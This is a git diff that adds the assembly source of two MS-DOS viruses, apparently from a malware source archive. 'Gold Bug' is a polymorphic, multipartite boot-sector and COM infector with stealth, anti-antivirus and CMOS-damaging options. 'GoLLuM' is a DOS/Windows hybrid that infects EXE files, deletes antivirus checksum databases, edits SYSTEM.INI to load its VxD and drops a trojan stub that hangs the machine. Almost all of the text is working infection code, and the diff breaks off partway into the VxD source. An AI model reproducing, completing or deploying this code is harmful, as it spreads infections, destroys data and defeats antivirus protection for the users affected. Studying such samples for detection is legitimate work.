diff --git a/MSDOS/Virus.MSDOS.Unknown.goldbug.asm b/MSDOS/Virus.MSDOS.Unknown.goldbug.asm new file mode 100644 index 00000000..e86df69f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.goldbug.asm @@ -0,0 +1,683 @@ +cseg segment para public 'code' +gold_bug proc near +assume cs:cseg + +;----------------------------------------------------------------------------- + +;designed by "Q" the misanthrope. + +;----------------------------------------------------------------------------- + +.186 +TRUE equ 001h +FALSE equ 000h + +;----------------------------------------------------------------------------- + +;option bytes used and where + +DELETE_SCANNERS equ FALSE ; -2 bytes -2 in com_code +CHECK_FOR_8088 equ TRUE ; 4 bytes 4 in com_code +INFECT_RANDOM equ TRUE ; 4 bytes 4 in com_code +CMOS_BOMB equ TRUE ; 4 bytes 4 in com_code +DEFLECT_DELETE equ TRUE ; 5 bytes 5 in com_code +READING_STEALTH equ TRUE ; 5 bytes 5 in com_code +SAME_FILE_DATE equ TRUE ; 24 bytes 24 in com_code +DOUBLE_DECRYPT equ TRUE ; 26 bytes 26 in com_code +EXECUTE_SPAWNED equ TRUE ; 35 bytes 32 in com_code 3 in boot_code +MODEM_CODE equ TRUE ; 40 bytes 29 in com_code 11 in boot_code +ANTI_ANTIVIRUS equ TRUE ; 46 bytes 35 in com_code 11 in boot_code +POLYMORPHIC equ TRUE ; 90 bytes 74 in com_code 16 in boot_code +MULTIPARTITE equ TRUE ;372 bytes 346 in com_code 26 in boot_code + +;----------------------------------------------------------------------------- + +;floppy boot infection + +FLOPPY_1_2M equ 001h +FLOPPY_760K equ 000h +FLOPPY_TYPE equ FLOPPY_1_2M + +;----------------------------------------------------------------------------- + +IFE MULTIPARTITE +DELETE_SCANNERS equ FALSE +CHECK_FOR_8088 equ FALSE +INFECT_RANDOM equ FALSE +DEFLECT_DELETE equ FALSE +READING_STEALTH equ FALSE +SAME_FILE_DATE equ FALSE +EXECUTE_SPAWNED equ FALSE +POLYMORPHIC equ FALSE +ENDIF + +;----------------------------------------------------------------------------- + +SECTOR_SIZE equ 00200h +RES_OFFSET equ 0fb00h +COM_OFFSET equ 00100h +RELATIVE_OFFSET equ RES_OFFSET-COM_OFFSET +PART_OFFSET equ COM_OFFSET+SECTOR_SIZE +BOOT_OFFSET equ 07c00h +RELATIVE_BOOT equ BOOT_OFFSET-PART_OFFSET +LOW_JMP_10 equ 0031ch +LOW_JMP_21 equ 00321h +SAVE_INT_CHAIN equ 0032ch +SCRATCH_AREA equ 08000h +HEADER_SEGMENT equ 00034h +INT_21_IS_NOW equ 0cch +BIOS_INT_13 equ 0c6h +NEW_INT_13_LOOP equ 0cdh +BOOT_SECTOR equ 001h +DESCRIPTOR_OFF equ 015h +IF FLOPPY_TYPE EQ FLOPPY_1_2M +DESCRIPTOR equ 0f909h +OLD_BOOT_SECTOR equ 00eh +COM_CODE_SECTOR equ 00dh +ELSE +DESCRIPTOR equ 0f905h +OLD_BOOT_SECTOR equ 005h +COM_CODE_SECTOR equ 004h +ENDIF +READ_ONLY equ 001h +SYSTEM equ 004h +DELTA_RI equ 004h +DSR equ 020h +CTS equ 010h +CD equ 080h +FAR_JUMP equ 0eah +MIN_FILE_SIZE equ 00500h +PSP_SIZE equ 00100h +VIRGIN_INT_13_A equ 00806h +VIRGIN_INT_13_B equ 007b4h +VIRGIN_INT_2F equ 00706h +FAR_JUMP_OFFSET equ 006h +SET_INT_OFFSET equ 007h +CHANGE_SEG_OFF equ 009h +VIDEO_MODE equ 00449h +MONOCHROME equ 007h +COLOR_VIDEO_MEM equ 0b000h +ADDR_MUL equ 004h +SINGLE_BYTE_INT equ 003h +VIDEO_INT equ 010h +VIDEO_INT_ADDR equ VIDEO_INT*ADDR_MUL +DISK_INT equ 013h +DISK_INT_ADDR equ DISK_INT*ADDR_MUL +SERIAL_INT equ 014h +DOS_INT equ 021h +DOS_INT_ADDR equ DOS_INT*ADDR_MUL +MULTIPLEX_INT equ 02fh +COMMAND_LINE equ 080h +FIRST_FCB equ 05ch +SECOND_FCB equ 06ch +NULL equ 00000h +GET_PORT_STATUS equ 00300h +WRITE_TO_PORT equ 00100h +HD_0_HEAD_0 equ 00080h +READ_A_SECTOR equ 00201h +WRITE_A_SECTOR equ 00301h +GET equ 000h +SET equ 001h +DELETE_W_FCB equ 01300h +DEFAULT_DRIVE equ 000h +GET_DEFAULT_DR equ 01900h +DOS_SET_INT equ 02500h +FILE_DATE_TIME equ 05700h +DENYNONE equ 040h +OPEN_W_HANDLE equ 03d00h +READ_W_HANDLE equ 03f00h +WRITE_W_HANDLE equ 04000h +CLOSE_HANDLE equ 03e00h +UNLINK equ 04100h +FILE_ATTRIBUTES equ 04300h +RESIZE_MEMORY equ 04a00h +QUERY_FREE_HMA equ 04a01h +ALLOCATE_HMA equ 04a02h +EXEC_PROGRAM equ 04b00h +GET_ERROR_LEVEL equ 04d00h +TERMINATE_W_ERR equ 04c00h +RENAME_A_FILE equ 05600h +LSEEK_TO_END equ 04202h +CREATE_NEW_FILE equ 05b00h +RESIDENT_LENGTH equ 068h +PARAMETER_TABLE equ 005f1h +MAX_PATH_LENGTH equ 00080h +EXE_HEADER_SIZE equ 020h +NEW_EXE_HEADER equ 00040h +NEW_EXE_OFFSET equ 018h +PKLITE_SIGN equ 'KP' +PKLITE_OFFSET equ 01eh +NO_OF_COM_PORTS equ 004h +WINDOWS_BEGIN equ 01605h +WINDOWS_END equ 01606h +ERROR_IN_EXE equ 0000bh +IF POLYMORPHIC +FILE_SIGNATURE equ 07081h +XOR_SWAP_OFFSET equ byte ptr ((offset serial_number)-(offset com_code))+TWO_BYTES +FILE_LEN_OFFSET equ byte ptr ((offset serial_number)-(offset com_code))+THREE_BYTES +FIRST_UNDO_OFF equ byte ptr ((offset first_jmp)-(offset com_code)+ONE_BYTE) +SECOND_UNDO_OFF equ byte ptr ((offset second_jmp)-(offset com_code)) +BL_BX_OFFSET equ byte ptr ((offset incbl_incbx)-(offset com_code)) +ROTATED_OFFSET equ byte ptr ((offset rotated_code)-(offset com_code)) +ELSE +FILE_SIGNATURE equ 0070eh +ENDIF +IF MODEM_CODE +STRING_LENGTH equ byte ptr ((offset partition_sig)-(offset string)) +ENDIF +IF EXECUTE_SPAWNED +EXEC_SUBTRACT equ byte ptr ((offset file_name)-(offset exec_table)) +ENDIF +DH_OFFSET equ byte ptr ((offset dh_value )-(offset initialize_boot)+TWO_BYTES) +ONE_NIBBLE equ 004h +ONE_BYTE equ 001h +TWO_BYTES equ 002h +THREE_BYTES equ 003h +FOUR_BYTES equ 004h +FIVE_BYTES equ 005h +FIVE_BITS equ 005h +EIGHT_BYTES equ 008h +USING_HARD_DISK equ 080h +KEEP_CF_INTACT equ 002h +CMOS_CRC_ERROR equ 02eh +CMOS_PORT equ 070h +REMOVE_NOP equ 001h +CR equ 00dh +LF equ 00ah +INT3_INCBX equ 043cch +INC_BL equ 0c3feh +INCBX_INCBL_XOR equ INT3_INCBX XOR INC_BL +JMP_NO_SIGN equ 079h +JMP_NOT_ZERO equ 075h +JNS_JNZ_XOR equ JMP_NO_SIGN XOR JMP_NOT_ZERO +CLI_PUSHCS equ 00efah + +;----------------------------------------------------------------------------- + +video_seg segment at 0c000h + org 00000h +original_int_10 label word +video_seg ends + +;----------------------------------------------------------------------------- + +io_seg segment at 00070h + org 00893h +original_2f_jmp label word +io_seg ends + +;----------------------------------------------------------------------------- + + org COM_OFFSET +com_code: + +;----------------------------------------------------------------------------- + + IF POLYMORPHIC +first_decode proc near +serial_number: xor word ptr ds:[si+bx+FIRST_UNDO_OFF],MIN_FILE_SIZE + org $-REMOVE_NOP + org $-FIVE_BYTES + jmp load_it + org $+TWO_BYTES +rotated_code: int SINGLE_BYTE_INT + into + adc al,0d4h +incbl_incbx: inc bl +first_jmp: jnz serial_number + add bx,si + jns serial_number +first_decode endp + +;----------------------------------------------------------------------------- + + IF DOUBLE_DECRYPT +second_decode proc near + push si +get_next_byte: lodsw + add bx,ax + inc bx + xor byte ptr ds:[si+SECOND_UNDO_OFF],bl + org $-REMOVE_NOP + dec si +second_jmp: jns get_next_byte + pop si +second_decode endp + ENDIF + ENDIF + +;----------------------------------------------------------------------------- + +com_start proc near + IF MULTIPARTITE + push cs + pop es + call full_move_w_si + mov ds,cx + cmp cx,word ptr ds:[NEW_INT_13_LOOP*ADDR_MUL] + jne dont_set_int + mov di,VIRGIN_INT_13_B + call set_both_ints + push cs + pop es + ENDIF +dont_set_int: IF CHECK_FOR_8088 + mov cl,RESIDENT_LENGTH + mov al,high(RESIZE_MEMORY) + shl ax,cl + mov bx,cx + int DOS_INT + ELSEIF MULTIPARTITE + mov bx,RESIDENT_LENGTH + mov ah,high(RESIZE_MEMORY) + int DOS_INT + ENDIF + IF EXECUTE_SPAWNED + pusha + call from_com_code+RELATIVE_OFFSET + popa + push cs + pop ds + push cs + pop es + cmpsw + mov dx,si + sub si,EXEC_SUBTRACT + org $-REMOVE_NOP + mov bx,PARAMETER_TABLE + mov di,bx + mov ax,EXEC_PROGRAM +set_table: scasw + movsb + scasb + mov word ptr ds:[di],ds + je set_table + int DOS_INT + mov ah,high(GET_ERROR_LEVEL) + int DOS_INT + mov ah,high(TERMINATE_W_ERR) + ELSEIF MULTIPARTITE + call from_com_code+RELATIVE_OFFSET + mov ax,TERMINATE_W_ERR + ENDIF + IF MULTIPARTITE + int DOS_INT + ELSE + jmp boot_load + ENDIF +com_start endp + + +;----------------------------------------------------------------------------- + +high_code proc near + mov dx,offset int_10_start+RELATIVE_OFFSET + mov bx,LOW_JMP_10-FAR_JUMP_OFFSET + call set_int_10_21 + mov bx,VIDEO_INT_ADDR-SET_INT_OFFSET +low_code: mov es,cx + mov cl,OLD_BOOT_SECTOR + mov dx,LOW_JMP_10 + call set_interrupt + mov bx,BOOT_OFFSET + pop dx + int DISK_INT + xor dh,dh + mov cl,BOOT_SECTOR + mov ax,WRITE_A_SECTOR +high_code endp + +;----------------------------------------------------------------------------- + +interrupt_13 proc far +int_13_start: IF MULTIPARTITE + mov byte ptr cs:[drive_letter+ONE_BYTE+RELATIVE_OFFSET],dl + ENDIF + cmp cx,BOOT_SECTOR + jne no_boot_sector + cmp ah,high(READ_A_SECTOR) + jne no_boot_sector + cmp dx,HD_0_HEAD_0 + jbe reread_boot +no_boot_sector: int NEW_INT_13_LOOP + jmp short return_far +reread_boot: int NEW_INT_13_LOOP + jc return_far + pusha + push ds + push es + pop ds +check_old_boot: mov ax,READ_A_SECTOR + xor dh,dh + mov cl,OLD_BOOT_SECTOR + IF ANTI_ANTIVIRUS + cmp word ptr ds:[bx],'HC' + ELSE + cmp word ptr ds:[bx],CLI_PUSHCS + ENDIF + je read_old_boot + test dl,USING_HARD_DISK + jnz encode_hd + cmp word ptr ds:[bx+DESCRIPTOR_OFF-ONE_BYTE],DESCRIPTOR + jne time_to_leave + mov dh,al + pusha + int NEW_INT_13_LOOP + cmp byte ptr ds:[bx],ch + popa + pushf + pusha + xor dh,dh + mov cl,al + int NEW_INT_13_LOOP + popa + popf + jne time_to_leave +encode_hd: mov ah,high(WRITE_A_SECTOR) + push ax + int NEW_INT_13_LOOP + pop ax + jc time_to_leave + mov di,bx + call move_code + mov cl,COM_CODE_SECTOR + IF POLYMORPHIC + xor byte ptr ds:[bx+XOR_SWAP_OFFSET],dh + org $-REMOVE_NOP + jo dont_flip_it + xchg word ptr ds:[bx+ROTATED_OFFSET],ax + org $-REMOVE_NOP + xchg ah,al + xchg word ptr ds:[bx+ROTATED_OFFSET+TWO_BYTES],ax + org $-REMOVE_NOP + xchg word ptr ds:[bx+ROTATED_OFFSET],ax + org $-REMOVE_NOP + ENDIF +dont_flip_it: pusha + int NEW_INT_13_LOOP + popa + mov di,bx + call move_some_more + mov byte ptr ds:[bx+DH_OFFSET],dh + org $-REMOVE_NOP + mov dh,cl + inc cx + int NEW_INT_13_LOOP + jmp short check_old_boot +read_old_boot: mov dh,byte ptr ds:[bx+DH_OFFSET] + org $-REMOVE_NOP + int NEW_INT_13_LOOP +time_to_leave: pop ds + popa + clc +return_far: retf KEEP_CF_INTACT +interrupt_13 endp + +;----------------------------------------------------------------------------- + +interrupt_2f proc far + pusha + push ds + push es + push offset return_to_2f+RELATIVE_OFFSET + xor cx,cx + mov ds,cx + mov bx,SAVE_INT_CHAIN-SET_INT_OFFSET + cmp ax,WINDOWS_END + jne try_another + les dx,dword ptr ds:[bx+SET_INT_OFFSET] + jmp short set_13_chain +try_another: cmp ax,WINDOWS_BEGIN + jne another_return + mov di,VIRGIN_INT_13_B + call get_n_set_int+ONE_BYTE + les dx,dword ptr ds:[BIOS_INT_13*ADDR_MUL] +set_13_chain: mov ax,READ_A_SECTOR + call get_set_part + mov bx,VIRGIN_INT_13_B-SET_INT_OFFSET + call set_interrupt + mov bl,low(VIRGIN_INT_13_A-SET_INT_OFFSET) + call set_interrupt + mov ah,high(WRITE_A_SECTOR) +interrupt_2f endp + +;----------------------------------------------------------------------------- + +get_set_part proc near + pusha + push es + mov bx,SCRATCH_AREA + mov es,bx + mov dx,HD_0_HEAD_0 + inc cx + int NEW_INT_13_LOOP + mov ax,READ_A_SECTOR + int DISK_INT + pop es + popa +another_return: ret +get_set_part endp + +;----------------------------------------------------------------------------- + +return_to_2f proc near + pop es + pop ds + popa + jmp far ptr original_2f_jmp +return_to_2f endp + +;----------------------------------------------------------------------------- + +interrupt_10 proc far +int_10_start: pushf + pusha + push ds + push es + push offset a_return+RELATIVE_OFFSET +from_com_code: xor bx,bx + mov ds,bx + or ah,ah + jz set_10_back + mov ax,QUERY_FREE_HMA + int MULTIPLEX_INT + cmp bh,high(MIN_FILE_SIZE+SECTOR_SIZE) + jb another_return + mov ax,ALLOCATE_HMA + int MULTIPLEX_INT + clc + call full_move_w_di + mov dx,offset int_13_start+RELATIVE_OFFSET + call set_13_chain + mov bx,VIRGIN_INT_2F-SET_INT_OFFSET + mov dx,offset interrupt_2f+RELATIVE_OFFSET + call set_interrupt + cmp word ptr ds:[LOW_JMP_10],cx + je set_10_back + push es + push es + mov di,DOS_INT_ADDR + mov bx,INT_21_IS_NOW*ADDR_MUL-SET_INT_OFFSET + call get_n_set_int+ONE_BYTE + pop ds + mov bx,offset old_int_10_21-SET_INT_OFFSET+RELATIVE_OFFSET+ONE_BYTE + call set_interrupt + mov ds,cx + mov ax,DOS_SET_INT+DOS_INT + mov dx,LOW_JMP_21 + int INT_21_IS_NOW + pop es + mov bx,dx + mov dx,offset interrupt_21+RELATIVE_OFFSET + mov word ptr ds:[bx],0b450h + mov word ptr ds:[bx+TWO_BYTES],0cd19h + mov word ptr ds:[bx+FOUR_BYTES],05800h+INT_21_IS_NOW + call set_int_10_21 +set_10_back: mov di,offset old_int_10_21+RELATIVE_OFFSET+ONE_BYTE + mov bx,LOW_JMP_10-FAR_JUMP_OFFSET +interrupt_10 endp + +;----------------------------------------------------------------------------- + +get_n_set_int proc near + les dx,dword ptr cs:[di] + jmp short set_interrupt +set_int_10_21: mov byte ptr ds:[bx+FAR_JUMP_OFFSET],FAR_JUMP +set_interrupt: mov word ptr ds:[bx+SET_INT_OFFSET],dx + mov word ptr ds:[bx+CHANGE_SEG_OFF],es + ret +get_n_set_int endp + +;----------------------------------------------------------------------------- + + IF MULTIPARTITE +set_both_ints proc near + mov bx,(NEW_INT_13_LOOP*ADDR_MUL)-SET_INT_OFFSET + call get_n_set_int+ONE_BYTE + mov bl,low(BIOS_INT_13*ADDR_MUL)-SET_INT_OFFSET + jmp short set_interrupt +set_both_ints endp + ENDIF + +;----------------------------------------------------------------------------- + + IF EXECUTE_SPAWNED +exec_table db COMMAND_LINE,FIRST_FCB,SECOND_FCB + ENDIF + +;----------------------------------------------------------------------------- + + IF MODEM_CODE + org PART_OFFSET+001f3h +string db CR,'1O7=0SLMTA' + ENDIF + +;----------------------------------------------------------------------------- + + org PART_OFFSET+SECTOR_SIZE-TWO_BYTES +partition_sig dw 0aa55h + +;----------------------------------------------------------------------------- + + org PART_OFFSET+SECTOR_SIZE+TWO_BYTES +file_name db 'DA',027h,'BOYS.COM',NULL + +;----------------------------------------------------------------------------- + + org PARAMETER_TABLE + dw NULL,NULL,NULL,NULL,NULL,NULL,NULL + db NULL + +;----------------------------------------------------------------------------- + + IFE MULTIPARTITE +boot_load proc near + push cs + pop es + call full_move_w_si + mov ds,cx + cmp cx,word ptr ds:[NEW_INT_13_LOOP*ADDR_MUL] + jne dont_set_intcd + lds dx,dword ptr ds:[VIRGIN_INT_13_B] + mov ax,DOS_SET_INT+NEW_INT_13_LOOP + int DOS_INT +dont_set_intcd: mov ah,high(GET_DEFAULT_DR) + int DOS_INT + call from_com_code+RELATIVE_OFFSET + mov ax,TERMINATE_W_ERR + int DOS_INT +boot_load endp + ENDIF + +;----------------------------------------------------------------------------- + + IF POLYMORPHIC +load_it proc near + mov word ptr ds:[si],FILE_SIGNATURE + mov byte ptr ds:[si+TWO_BYTES],FIRST_UNDO_OFF + push bx + xor ax,ax + cli + out 043h,al + in al,040h + mov ah,al + in al,040h + sti + push ax + and ax,0001eh + mov bx,ax + mov ax,word ptr ds:[bx+two_byte_table] + mov word ptr ds:[si+ROTATED_OFFSET+TWO_BYTES],ax + org $-REMOVE_NOP + pop ax + and ax,003e0h + mov cl,FIVE_BITS + shr ax,cl + mov bx,ax + mov al,byte ptr ds:[bx+one_byte_table] + xor al,low(INC_BL) + mov byte ptr ds:[swap_incbx_bl+THREE_BYTES],al + pop bx + jmp com_start +load_it endp + +;----------------------------------------------------------------------------- + +two_byte_table: mov al,0b2h + xor al,0b4h + and al,0d4h + les ax,dword ptr ds:[si] + les cx,dword ptr ds:[si] + les bp,dword ptr ds:[si] + adc al,0d4h + and al,084h + adc al,084h + adc al,024h + add al,084h + add al,014h + add al,024h + test dl,ah + repz stc + repnz stc + +;----------------------------------------------------------------------------- + +one_byte_table: int SINGLE_BYTE_INT + into + daa + das + aaa + aas + inc ax + inc cx + inc dx + inc bp + inc di + dec ax + dec cx + dec dx + dec bp + dec di + nop + xchg ax,cx + xchg ax,dx + xchg ax,bp + xchg ax,di + cbw + cwd + lahf + scasb + scasw + xlat + repnz + repz + cmc + clc + stc + ENDIF + +;----------------------------------------------------------------------------- + +gold_bug endp +cseg ends +end com_code diff --git a/MSDOS/Virus.MSDOS.Unknown.gollum.asm b/MSDOS/Virus.MSDOS.Unknown.gollum.asm new file mode 100644 index 00000000..f9c1ed44 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.gollum.asm @@ -0,0 +1,1027 @@ +; +; +; GoLLuM ViRuS - BioCoded by GriYo/29A +; CopyRight (c) 1997 All RiGhts ReseRVed +; World's first DOS/Win hybrid ever +; +; +; GoLLuM is the very first hybrid DOS-Windows virus ever... it infects DOS +; EXE files only when they're executed inside a DOS window under any of +; the known versions of Microsoft Windows (Windows 3.1x, Windows95...). It +; becomes resident as a virtual device driver when Windows starts, and +; then hooks V86 int 21h in order to monitor file execution, trying to in- +; fect more files under DOS sessions. +; +; When an EXE file is executed inside a MS-DOS window, GoLLuM will attach +; itself to the end of the file (it copies first its DOS code and then the +; VxD file, both of them encrypted with a simple 'not' operation). GoLLuM +; will not infect files that have digits or the 'V' character in their na- +; mes (this includes AVP, MSAV, CPAV...), as well as Thunderbyte utilities +; (TB*.*), McAffee shit and F-Prot. +; +; The virus also deletes some AV database files (ANTI-VIR.DAT, CHKLIST.MS, +; AVP.CRC, IVB.NTZ and CHKLIST.TAV) whenever it infects a file. When these +; infected files are run, GoLLuM inserts the string 'DEVICE=GOLLUM.386' +; into the [386Enh] section of the SYSTEM.INI file, and then drops its VxD +; file into the Windows \SYSTEM directory. +; +; The encryption used by GoLLuM consists on a simple 'not' operation, but +; the decryptor contains a little emulation trick (try to TbClean it!). +; Besides, it contains a date-triggered event, in which it will drop tro- +; jan files (using the DOS stub in its VxD file). +; +; I wrote this just for fun while learning something on VxD coding. GoLLuM +; consists on the following files: +; +; GOLLUM.ASM DOS virus code +; CRYPT.ASM Code used to encrypt DOS virus code +; WGOLLUM.MAK VxD makefile +; WGOLLUM.DEF VxD def file +; VXDSTUB.ASM VxD stub used in trojans +; WGOLLUM.ASM VxD virus code +; ASSEMBLE.BAT Batch file used to build GOLLUM.INC +; +; - -[GOLLUM.ASM - DOS virus code]- - - - - - - - - - - - - - - - - - - ->8 + +I_am_GoLLuM segment para 'CODE' + +Header_Size equ 1Ch +VxD_File_Size equ 6592 +Decryptor_Size equ offset Bilbo_Dead +All_Size equ offset Old_Header+(Header_Size+VxD_File_Size) + Assume cs:I_am_GoLLuM,ds:I_am_GoLLuM,es:I_am_GoLLuM,ss:I_am_GoLLuM + +;Virus entry point (code inserted intro infected .EXE files) +; +GoLLuM_Entry_Point: + ;Get delta offset stored on infection + mov bp,0000h + ;Save segment regs + push ds + push es + ;Point segment regs to our code + mov ax,cs + mov ds,ax + mov es,ax + ;Decrypt virus and VxD file + mov si,offset Bilbo_Dead + add si,bp + mov di,si + mov cx,(All_Size-Decryptor_Size+01h)/02h +Decrypt_Gollum: + + ;Dont let GoLLum be emulated (Meeethyyyl! ;) + cld + lodsw + push ax + pop ax + cli + sub sp,0002h + pop ax + sti + not ax + cld + stosw + loop Decrypt_Gollum + ;Clear prefetch + db 0EBh,00h + +;Drop GOLLUM.386 file and insert DEVICE=GOLLUM.386 into SYSTEM.INI +; +Bilbo_Dead: + ;Find SYSTEM.INI file + mov si,offset Win_Sys_Table + add si,bp + mov cx,0005h + cld +Search_Loop: + lodsw + mov dx,ax + add dx,bp + ;Open file (read/write access) + mov ax,3D02h + int 21h + jnc Open_Ok + ;Try next file name + loop Search_Loop + jmp Gollum_Leave +Open_Ok: + ;Save SYSTEM.INI file handle + mov word ptr cs:[System_Handle][bp],ax + ;Build VxD file name + mov si,dx + mov di,offset VxD_File + add di,bp + mov dx,di +Copy_Directory: + lodsb + cmp al,"." + je Found_Extension + stosb + jmp Copy_Directory +Found_Extension: + ;Insert the path separator + mov al,"\" + stosb + ;Insert the name of the VxD file + mov si,offset Device_String+09h + add si,bp + mov cx,000Ah + rep movsb + ;Put the null marker + xor al,al + stosb + ;Create de VxD file, abort if exist + mov ah,5Bh + xor cx,cx + mov dx,offset VxD_File + add dx,bp + int 21h + jc Close_Sys + ;Write VxD to file + xchg bx,ax + mov ah,40h + mov dx,offset Old_Header+Header_Size + add dx,bp + mov cx,VxD_File_Size + int 21h + jnc ok_VxD_Write + ;Close VxD file if error... + mov ah,3Eh + int 21h + ;...and delete it! + mov ah,41h + mov dx,offset VxD_File + add dx,bp + int 21h +Close_Sys: + mov bx,word ptr cs:[System_Handle][bp] + jmp Exit_Infection +ok_VxD_Write: + ;Get handle of SYSTEM.INI file + mov bx,word ptr cs:[System_Handle][bp] + ;Seek to EOF + mov ax,4202h + xor cx,cx + xor dx,dx + int 21h + jc Bad_Size + ;Strange! SYSTEM.INI file too big + or dx,dx + jnz Bad_Size + cmp ax,VxD_File_Size + jb Size_Ok +Bad_Size: + jmp Exit_Infection +Size_Ok: + ;Save SYSTEM.INI file size + mov word ptr cs:[System_Size][bp],ax + ;Seek to BOF + mov ax,4200h + xor cx,cx + xor dx,dx + int 21h + jc Bad_Size + ;Read SYSTEM.INI over VxD file copy + mov ah,3Fh + mov cx,word ptr cs:[System_Size][bp] + mov dx,offset Old_Header+Header_Size + add dx,bp + int 21h + jc bad_size + ;Check if SYSTEM.INI have been infected + mov cx,word ptr cs:[System_Size][bp] + mov di,dx + mov al,"G" +Do_Inspect: + cld + repne scasb + or cx,cx + jz System_Clean + ;Exit if already resident + cmp word ptr es:[di],"LO" + jne Do_Inspect + cmp word ptr es:[di+02h],"UL" + jne Do_Inspect + jmp Exit_Infection +System_Clean: + ;Search for [386Enh] string + mov cx,word ptr cs:[System_Size][bp] + mov di,dx +Section_Search: + cld + mov si,di + lodsw + cmp ax,"3[" + jne Next_Char + lodsw + cmp ax,"68" + je Section_Found +Next_Char: + inc di + loop Section_Search + ;Section not found, abort + jmp Exit_Infection +Section_Found: + ;Save distance from [386Enh] string to EOF + mov ax,0008h + sub cx,ax + add di,ax + sub word ptr cs:[System_Size][bp],cx + ;Seek next to [386Enh] string + mov ax,4202h + mov dx,cx + neg dx + xor cx,cx + dec cx + int 21h + jc Exit_Infection + ;Write our load string + mov ah,40h + mov cx,0015h + mov dx,offset Device_String + add dx,bp + int 21h + jc Exit_Infection + ;Write the rest of SYSTEM.INI file + mov ah,40h + mov cx,word ptr cs:[System_Size][bp] + mov dx,di + int 21h +Exit_Infection: + ;Close file (bx=handle) + mov ah,3Eh + int 21h + +;Get control back to host +; +Gollum_Leave: + ;Restore segment registers + pop es + pop ds + ;File SYSTEM.INI not found, return to host + mov ah,62h + int 21h + add bx,10h + add word ptr cs:[exe_cs][bp],bx + ;Restore stack + cli + add bx,word ptr cs:[Old_Header+0Eh][bp] + mov ss,bx + mov sp,word ptr cs:[Old_Header+10h][bp] + sti + ;Clear some regs + xor ax,ax + xor bx,bx + xor cx,cx + xor dx,dx + xor si,si + xor di,di + xor bp,bp + ;Clear prefetch + db 0EBh,00h + ;Jump to original entry point + db 0EAh +exe_ip dw 0000h +exe_cs dw 0000h + +; + ;String table +Win_Sys_Table dw offset Win_Sys_01h + dw offset Win_Sys_02h + dw offset Win_Sys_03h + dw offset Win_Sys_04h + dw offset Win_Sys_05h + ;Posible locations of SYSTEM.INI file +Win_Sys_01h db "C:\WINDOWS\SYSTEM.INI",00h +Win_Sys_02h db "C:\WIN\SYSTEM.INI",00h +Win_Sys_03h db "C:\WIN31\SYSTEM.INI",00h +Win_Sys_04h db "C:\WIN311\SYSTEM.INI",00h +Win_Sys_05h db "C:\WIN95\SYSTEM.INI",00h + ;Buffer where virus build VxD file name and path +VxD_File db 20h dup (00h) + ;String inserted into SYSTEM.INI +Device_String db 0Dh,0Ah,"DEVICE=GOLLUM.386",0Dh,0Ah + ;Misc data +System_Size dw 0000h +System_Handle dw 0000h + ;Next bytes = Old .EXE header + VxD file copy +Old_Header equ this byte +; + +I_am_GoLLuM ends + end GoLLuM_Entry_Point + +; - -[CRYPT.ASM - Code used to encrypt DOS virus code]- - - - - - - - - ->8 + +vir_test segment para 'CODE' + Assume cs:vir_test,ds:vir_test,es:vir_test,ss:vir_test + org 0000h +Start: + mov ax,cs + mov ds,ax + mov es,ax + mov ax,3D00h + mov dx,offset f_name + int 21h + jc exit_prog + xchg bx,ax + mov ah,3Fh + mov cx,0FFFFh + mov dx,offset copy + int 21h + jc close_file + push ax + mov ah,3Eh + int 21h + jc close_file + mov si,offset copy+0027h + mov di,si + mov cx,9000 + cld +encrypt: + lodsb + not al + stosb + loop encrypt + mov ah,3Ch + xor cx,cx + mov dx,offset x_name + int 21h + jc exit_prog + xchg bx,ax + mov ah,40h + mov dx,offset copy + pop cx + int 21h +close_file: + mov ah,3Eh + int 21h +exit_prog: + mov ax,4C00h + int 21h +f_name db "GOLLUM.BIN",00h +x_name db "GOLLUM.CRP",00h +copy db 10000 dup (00h) +vir_test ends + end Start + +; - -[WGOLLUM.MAK - VxD makefile] - - - - - - - - - - - - - - - - - - - ->8 + +# file: wgollum.mak (VxD makefile) +all : wgollum.exe + +vxdstub.obj: vxdstub.asm + masm -Mx -p -w2 vxdstub; + +vxdstub.exe: vxdstub.obj + link vxdstub.obj; + +wgollum.obj: wgollum.asm .\debug.inc .\vmm.inc .\shell.inc + masm5 -p -w2 -Mx $(Debug) wgollum.asm; + +objs = wgollum.obj + +wgollum.386: vxdstub.exe wgollum.def $(objs) + link386 @wgollum.lnk + addhdr wgollum.386 + mapsym32 wgollum + +wgollum.exe: wgollum.386 + copy wgollum.386 wgollum.exe + +; - -[WGOLLUM.DEF - VxD def file] - - - - - - - - - - - - - - - - - - - ->8 + +library wgollum +description 'GoLLuM ViRuS for Microsoft Windows by GriYo/29A' +stub 'vxdstub.exe' +exetype dev386 + +segments + _ltext preload nondiscardable + _ldata preload nondiscardable + _itext class 'icode' discardable + _idata class 'icode' discardable + _text class 'pcode' nondiscardable + _data class 'pcode' nondiscardable + +; - -[VXDSTUB.ASM - VxD stub used in trojans] - - - - - - - - - - - - - ->8 + + name vxdstub +_TEXT segment word public 'CODE' + assume cs:_TEXT,ds:_TEXT,es:_TEXT + +;Activation routine +; + +vxdstub proc far + ;Segment regs! + mov ax,cs + mov ds,ax + mov es,ax + ;Set video mode 80x25x16c + mov ax,0003h + int 10h + ;Print "Gollum!" + mov ax,1301h + mov bx,0002h + mov cx,0007h + mov dx,0A24h + mov bp,offset Gollum_Says + int 10h + ;Endless loop +Dead_Zone: + ;Aaaarrrgggghhhhh!!!! + jmp Dead_Zone + + ;Text printed on screen +Gollum_Says db "GoLLum!" + +vxdstub endp + +_TEXT ends + end vxdstub + +; - -[WGOLLUM.ASM - VxD virus code] - - - - - - - - - - - - - - - - - - ->8 + +.386p +;Ŀ +;Includes +; + +.XLIST +INCLUDE Vmm.Inc +INCLUDE SheLL.Inc +.LIST + +;Ŀ +;Virtual device declaration +; + +Declare_Virtual_Device WGoLLuM,03h,00h,WGoLLuM_Control,Undefined_Device_ID,,, + +;Ŀ +;Initialization data segment +; + +VxD_IDATA_SEG + +VxD_Installation_Title db "GoLLuM ViRuS by GriYo/29A",00h +VxD_Installation_Msg db "Deep down here by the dark water lived old " + db "Gollum, a small slimy creature. I dont know " + db "where he came from, nor who or what he was. " + db "He was a Gollum -as dark as darkness, except " + db "for two big round pale eyes in his thin face." + db 0Dh,0Ah,0Dh,0Ah + db "J.R.R. ToLkieN ... The HoBBit" + db 0Dh,0Ah,0Dh,0Ah + db 00h + +VxD_IDATA_ENDS + +;Ŀ +;Local locked data segment +; + +VxD_LOCKED_DATA_SEG + +Header_Size equ 001Ch ;Dos .EXE header size 